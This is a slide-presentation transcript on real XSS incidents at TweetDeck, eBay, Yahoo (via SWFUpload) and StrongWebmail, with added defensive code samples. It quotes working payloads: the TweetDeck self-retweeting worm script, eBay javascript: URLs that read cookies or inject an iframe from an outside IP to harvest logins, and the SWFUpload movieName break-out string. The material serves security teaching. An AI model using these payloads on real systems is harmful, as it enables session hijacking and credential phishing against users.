
XSS VULNERABILITIES Nicole Coppola. XSS - Capabilities Cookie Theft – Session Hijacking Keylogging – addEventListener; passwords, credit cards, etc. Phishing.

Presentation transcript:

1 XSS VULNERABILITIES Nicole Coppola

2 XSS - Capabilities
Cookie Theft – Session Hijacking
Keylogging – addEventListener; passwords, credit cards, etc.
Phishing
“One of the most common and useful XSS attacks is used to steal the user’s session, effectively enabling an attacker to log in as you.” -- Trey Ford, Global Security Strategist at Rapid7
“Cross site scripting attacks aren't new and represent just one of the many vulnerabilities application developers need to consider when building an app like Tweetdeck.” -- Krishna Narayanaswamy, chief scientist at Netskope

3 XSS - Outline
Tweetdeck
eBay
Yahoo
Bonus
StrongWebmail – Vulnerability Contest
Facebook – Self XSS

4-6 TweetDeck
Web application for management of Twitter accounts
Founded in 2008 and acquired by Twitter in May 2011
June 11, 2014; TweetDeck v. <= 3.7.1; Google Chrome
Stored XSS vulnerability was discovered that allowed users to run JavaScript in tweets
Zero sanitization
Did not affect other applications using Twitter’s API
User @Firoxl, a 19-year-old boy from Austria, discovered this vulnerability because he wanted to tweet hearts with HTML encoding: “&hearts” -> ♥

7 TweetDeck - Example

8 82,138

9 TweetDeck - Example

10 TweetDeck – Lots of trolls

11

12-13 TweetDeck – How it worked
$('.xss').parents().eq(1).find('a').eq(1).click();$('[data-action=retweet]').click();alert('XSS in Tweetdeck')
- Script tag with class xss, so the payload can reference itself
$('.xss').parents().eq(1) - Using jQuery, select self’s second parent element -- the tweet container
.find('a').eq(1).click(); - From this container, select the second 'a' (link) tag -- the retweet link (popup confirmation; doesn’t actually retweet yet)
$('[data-action=retweet]').click(); - Confirms the popup and retweets
alert('XSS in Tweetdeck') - Warning popup to users
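The slides attribute the worm to "zero sanitization": TweetDeck rendered tweet text as HTML, which is why "&hearts;" turned into a heart and why a tweet containing a script tag executed. The following is an added example (not TweetDeck's code) showing the render path that has this defect beside a hardened one; the entity allowlist and the sample tweets are constructed for the demo.

```javascript
// Added example (not TweetDeck's code). The safe order is: decode the entities the UI
// wants to support into plain text, THEN HTML-escape before the text reaches innerHTML.
// Skipping the escape turns any tweet containing markup into live markup.

// Named entities the UI chooses to render (allowlist constructed for this demo).
const ENTITIES = { hearts: "\u2665", amp: "&", lt: "<", gt: ">", quot: '"' };

function decodeEntities(text) {
  // Only allowlisted named entities are decoded; anything else stays literal.
  return text.replace(/&([a-zA-Z]+);/g, (whole, name) =>
    Object.prototype.hasOwnProperty.call(ENTITIES, name) ? ENTITIES[name] : whole);
}

function escapeHtml(text) {
  // Neutralise every character that can open a tag or break out of an attribute.
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Defective rendering: decoded tweet text is dropped straight into the HTML, so both a
// literal "<script>" and an encoded "&lt;script&gt;" end up as a real script element.
function renderTweetUnsafe(tweetText) {
  return `<p class="tweet">${decodeEntities(tweetText)}</p>`;
}

// Hardened rendering: hearts still render, but "<" from the tweet becomes "&lt;".
function renderTweetSafe(tweetText) {
  return `<p class="tweet">${escapeHtml(decodeEntities(tweetText))}</p>`;
}

// Constructed sample tweets: the harmless heart, a tweet carrying an (empty) script tag
// with the class the worm used, and an entity-encoded tag that decodes into markup.
const HEART_TWEET = "I &hearts; TweetDeck";
const MARKUP_TWEET = '<script class="xss"></script>&hearts;';
const ENCODED_TAG_TWEET = "&lt;script&gt;&lt;/script&gt;";
```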

14 TweetDeck - Response

15 TweetDeck - Impact
TweetDeck user demographic: large organizations like the BBC (10.1 million followers)
Appears that it was largely trolls who exploited this
Malicious exploits: an attacker can obtain anything stored in the victim’s browser: cookies, passwords; redirect to a malicious webpage

16 eBay
Full of security holes
January 2016 – A reflected XSS attack was discovered in eBay’s website by independent vulnerability researcher MLT

17 eBay - XSS
http://ebay.com/link/?nav=webview&url=javascript:alert(document.cookie)
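The eBay link above takes a navigation target from the url query parameter and hands it to the browser without checking its scheme, so a javascript: value runs as script. The following is an added example (not eBay's code) of the check a link/redirect handler should apply; the host allowlist and sample inputs are constructed for the demo.

```javascript
// Added example (not eBay's code): validate a "webview" target taken from a query parameter.
// Hosts this link page may send the browser to (constructed allowlist for the demo).
const ALLOWED_HOSTS = new Set(["ebay.com", "www.ebay.com"]);

// Returns the validated absolute URL, or null when the target must be refused.
// rawParam is the already percent-decoded query value, as a server framework hands it over.
function safeWebviewTarget(rawParam, base = "https://www.ebay.com/") {
  if (typeof rawParam !== "string" || rawParam.trim() === "") return null;
  let target;
  try {
    // The WHATWG parser strips leading/trailing whitespace and lowercases the scheme,
    // so "  JaVaScRiPt:..." is still recognised as the javascript: scheme below.
    target = new URL(rawParam, base);
  } catch {
    return null; // unparseable target
  }
  // Allowlist the scheme: refusing everything but http(s) covers javascript:, data:,
  // vbscript: and any scheme not thought of, instead of blocklisting known-bad ones.
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;
  // Allowlist the destination so the page cannot double as an open redirector
  // (a protocol-relative "//other.host/" would otherwise pass the scheme check).
  if (!ALLOWED_HOSTS.has(target.hostname)) return null;
  return target.href;
}

// Constructed inputs: the slide's plain payload, an encoded iframe payload in the style of
// the slide (decoded once, as the server would), a mixed-case variant, and benign targets.
const INPUTS = {
  plainJs: "javascript:alert(document.cookie)",
  encodedJs: decodeURIComponent(
    "javascript:document.write%28%27%3Ciframe%20src=%22http://phishing.example/signin%22%3E%27%29"),
  mixedCaseJs: "  JaVaScRiPt:alert(1)",
  protocolRelative: "//phishing.example/signin",
  sameSiteAbsolute: "http://ebay.com/link/?nav=webview",
  sameSiteRelative: "/itm/123",
};
```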

18 eBay - XSS

19 Exploit Proof of Concept – phishing attack
Create and host a webpage identical to eBay’s login page
Craft a link to embed a custom iFrame
Harvest credentials

20-21 eBay - XSS
Decoded: http://ebay.com/link/?nav=webview&url=javascript:document.write('<iframe src="http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html" width="1500" height="1000">')
As sent: http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

22 eBay - XSS

23 Sent back to attacker
Logs input to log.txt
Can be used with:
Phishing – wide audience
Spear phishing – targeted

24 eBay - Response
Reported to eBay December 11, 2015
On January 11, 2016, MLT contacted the media; it was fixed that day
“They don’t really have any excuse for their MAIN DOMAIN being vuln to XSS” - MLT
Bad history of vulnerabilities and response:
XSS attack in internal messaging system – took a year to fix, after contacted by media (2014/2015)
Backdoor upload in php file (2014)
XSS in auction page (2014)
Cookie re-use (2014)
XSS when creating a listing (2011)
…

25 eBay - source

26 Yahoo
January-February 2013 – Phishing campaign hijacking accounts of Yahoo Mail users
Exploited CVE-2012-3414
Vulnerability in SWFUpload 2.2.0.1, used by WordPress v. <= 3.3.2, and patched in April 2012, 9 months prior
Vulnerability existed in the developers’ blog
Link appeared to bring users to msnbc.com: www.msnbc.msn.com-im9.net

27 Yahoo – Phishing Email

28

29 Redirected to website which executed call to developer.yahoo.com, exploiting the vulnerability
Disguised as Lightbox library
Login at yahoo.com; stay logged in at developer subdomain
Steal cookie and contacts list; repeat

30 Yahoo – XSS (SWFUpload)
User input: this.movieName = root.loaderInfo.parameters.movieName;
Processing: this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete"; …
Callbacks = first parameter to ExternalInterface.call, which executes JavaScript

31-34 Yahoo – POC – SWFUpload
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName=";]);}catch(e){} if(!self.a)self.a=!alert(document.cookie);//
Exploited (unsanitized) parameter: movieName
";]);}catch(e){} – exits the callback function built by this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete"; …
if(!self.a)self.a=!alert(document.cookie);// – defining self.a to execute the payload
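Slides 30 to 34 show the root cause: the callback name is built by concatenating the untrusted movieName parameter and then evaluated as JavaScript through ExternalInterface.call, so a value containing a quote and a bracket closes the string and the call around it. The following is an added example (not SWFUpload's code, written in JavaScript rather than the original ActionScript) that reproduces the concatenation, adds the identifier check that refuses such a value, and includes a small check for break-out characters; the identifier pattern, the 64-character limit and the sample names are assumptions for the demo.

```javascript
// Added example (not SWFUpload's code): the slide's concatenation, and the check it lacked.

// Mirrors the slide's string building (ActionScript in the original).
function buildCallbackUnsafe(movieName) {
  return 'SWFUpload.instances["' + movieName + '"].fileDialogComplete';
}

// A movie name is an identifier chosen by the embedding page; nothing legitimate needs
// quotes, brackets, braces or semicolons in it. Refusing everything outside [A-Za-z0-9_]
// removes every character the POC relies on. (Pattern and length cap are assumptions.)
const SAFE_MOVIE_NAME = /^[A-Za-z0-9_]{1,64}$/;

function buildCallbackSafe(movieName) {
  if (typeof movieName !== "string" || !SAFE_MOVIE_NAME.test(movieName)) {
    throw new Error("movieName rejected: not a plain identifier");
  }
  // Safe only because the check above ran; the string is still about to be evaluated.
  return buildCallbackUnsafe(movieName);
}

// Tells whether a built callback still names a single property path, or whether the
// inserted value carries characters that can terminate the quoted instance name.
function breaksOutOfString(callback) {
  const head = 'SWFUpload.instances["';
  const tail = '"].fileDialogComplete';
  const inner = callback.slice(head.length, callback.length - tail.length);
  return /["\]\);}]/.test(inner);
}

// Constructed sample values: a normal movie name, and the movieName value from the POC URL.
const NORMAL_NAME = "SWFUpload_0";
const POC_NAME = '";]);}catch(e){} if(!self.a)self.a=!alert(document.cookie);//';
```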

35 Yahoo - Response
Unpatched, “unrelated” site
“Drive-by Download”
History of hacks and vulnerabilities:
Mobile mail website XSS – November 2015
HTML email XSS – December 2015
Login XSS – December 2010
…
48 “Yahoo” CVE records on NVD

36 Yahoo - Response
T-Shirt-Gate
Yahoo started by giving people t-shirts / a $12.50 discount code for their store
Researchers can sell exploits for more profit; other companies offer rewards
Angry that they got $12.50 for their research
Yahoo Bug Bounty Program: $50-$15,000 reward for finding bugs, October 2013

37 StrongWebmail client – Bonus XSS
StrongWebmail claims to have “the most secure email accounts on the planet”
Two-factor authentication – must answer confirmation call before being authenticated
Held contest for anyone who can hack the CEO’s email account - $10,000 prize

38 StrongWebmail client – Bonus XSS
XSS vulnerability in subject field
Wrote an exploit to grab the inbox, session cookies, and task list (calendar), and log to a file
Sent spear phishing email to CEO claiming to have found the XSS exploit, with details in a file
Didn’t know if he would click on it... so emailed support@strongwebmail.com following up
StrongWebmail claimed they didn’t break the authentication, but ended up awarding the prize

39 Facebook - Bonus XSS

40

41

42 In Summary
TweetDeck
Scripting possible in the tweet body
Self re-tweeting
eBay
JavaScript injection in URL
Allowed injection of iFrame for phishing and credential harvesting
Yahoo
Unpatched Yahoo developer WordPress blog
Allowed cookie harvesting through phishing

43 In Conclusion
Vulnerabilities are out there; people make mistakes
3rd party code
Months between vulnerability being created and discovered
Many ways to exploit these vulnerabilities
Phishing
Imitating website
Getting cookie
Self replicating worms
Users do not think things through
Clicking links
Exploiting yourself with malicious code
Not noticing odd looking screens
Response to these attacks matters
Hours, months
Confidence of users (thousands of people left TweetDeck for HootSuite)
Potential impact

44 Questions?

45 Sources - TweetDeck
http://www.computerweekly.com/news/2240222426/Twitter-suspends-TweetDeck-over-XSS-security-flaw
http://webtrends.about.com/od/Twitter-Web/a/What-Is-Tweetdeck.htm
http://money.cnn.com/2014/06/11/technology/security/tweetdeck-hacked/index.html
http://thenextweb.com/twitter/2014/06/11/tweetdeck-users-xss-vulnerability-means-revoke-access-now/#gref
http://www.theguardian.com/technology/2014/jun/11/twitter-tweetdeck-xss-flaw-users-vulnerable
http://www.onthemedia.org/story/why-hell-tweetdeck-retweeting-my-little-pony-twitter-account/
http://www.acunetix.com/blog/articles/tweetdeck-worm-worked/

46 Sources - eBay
2015 XSS
http://www.securityweek.com/xss-flaw-exposed-ebay-users-phishing-attacks
https://ret2libc.wordpress.com/2016/01/11/a-tale-of-ebay-xss-and-shoddy-incident-response/
Previous attacks
http://motherboard.vice.com/read/a-flaw-on-ebays-site-allowed-hackers-to-steal-users-passwords
http://thehackernews.com/2014/05/worst-day-for-ebay-multiple-flaws-leave.html
https://threatpost.com/a-year-later-xss-vulnerability-still-exists-in-ebay/112493/
https://dl.packetstormsecurity.net/1107-exploits/ebay-xss.pdf

47 Sources - Yahoo
http://news.softpedia.com/news/Hackers-Hijack-Yahoo-Accounts-by-Stealing-Authentication-Cookies-325460.shtml
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3414
https://threatpost.com/yahoo-mail-breach-linked-old-wordpress-vulnerability-013113/77478/
http://www.nbcnews.com/technology/why-yahoo-email-accounts-are-being-hijacked-1B8219490
http://www.pcworld.com/article/2026798/email-attack-exploits-vulnerability-in-yahoo-site-to-hijack-accounts.html
http://www.hotforsecurity.com/blog/yahoo-accounts-hijacked-via-xss-type-attack-5172.html#comments
https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/
http://news.yahoo.com/why-yahoo-mail-accounts-being-hijacked-004126309.html
http://www.securityweek.com/stored-xss-found-yahoo-mail-mobile
http://www.theregister.co.uk/2016/01/19/finnish_bug_hunter_nets_10k_bounty_from_yahoo/
http://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
http://krebsonsecurity.com/2012/11/yahoo-email-stealing-exploit-fetches-700/
http://yahoodevelopers.tumblr.com/post/65622522325/the-bug-bounty-program-is-now-live

48 Sources - Bonus
StrongWebmail
http://news.softpedia.com/news/Webmail-Service-CEO-Hack-My-E-mail-Get-10-000-113478.shtml
http://www.zdnet.com/article/strongwebmail-ceos-mail-account-hacked-via-xss/
https://web.archive.org/web/20111211040709/http://www.fireblog.com/exclusive-interview-with-strongwebmails-10000-hacker/
Facebook
https://www.facebook.com/help/757846550903291
http://thehackernews.com/2014/07/facebook-self-xss-scam-fools-users-into_28.html
https://www.youtube.com/watch?v=XrzSaohJ0a8

